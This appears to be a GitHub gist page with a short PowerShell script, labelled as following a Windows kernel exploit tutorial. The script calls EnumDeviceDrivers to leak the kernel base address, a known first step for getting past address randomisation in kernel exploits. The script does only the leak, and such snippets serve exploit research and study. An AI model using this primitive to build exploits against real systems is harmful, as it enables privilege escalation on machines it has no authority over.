Created
September 26, 2023 03:16
-
-
Save aaaddress1/0ee14150c52905ebe0b0bb7892cb3412 to your computer and use it in GitHub Desktop.
Revisions
-
aaaddress1 created this gist
Sep 26, 2023 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,34 @@ Add-Type -TypeDefinition @" // ref: http://showlinkroom.me/2020/10/16/WindowKernelExploit01/ using System; using System.Diagnostics; using System.Runtime.InteropServices; using System.Security.Principal; public static class EVD2 { [DllImport("kernel32.dll")] public static extern uint GetLastError(); [DllImport("psapi")] public static extern bool EnumDeviceDrivers( [MarshalAs(UnmanagedType.LPArray, ArraySubType = UnmanagedType.U4)] [In][Out] UInt64[] ddAddresses, UInt32 arraySizeBytes, [MarshalAs(UnmanagedType.U4)] out UInt32 bytesNeeded ); } "@ Function LeakBaseAddress(){ $dwByte = 0 $status=[bool] [EVD2]::EnumDeviceDrivers(0, 0, [ref]$dwByte) if(!$status){ echo $("[*] Unable to enum device.... with error 0x{0:x}`n" -f [EVD2]::GetLastError()) } $ptrAddress = [Uint64[]](9)*0x1000 $status=[bool] [EVD2]::EnumDeviceDrivers([UInt64[]]$ptrAddress, $dwByte+10, [ref]$dwByte) # echo $("Address is {0:x}" -f $ptrAddress[0]) return $ptrAddress[0] } $leakAddress = LeakBaseAddress echo $("Address is {0:x}" -f $leakAddress)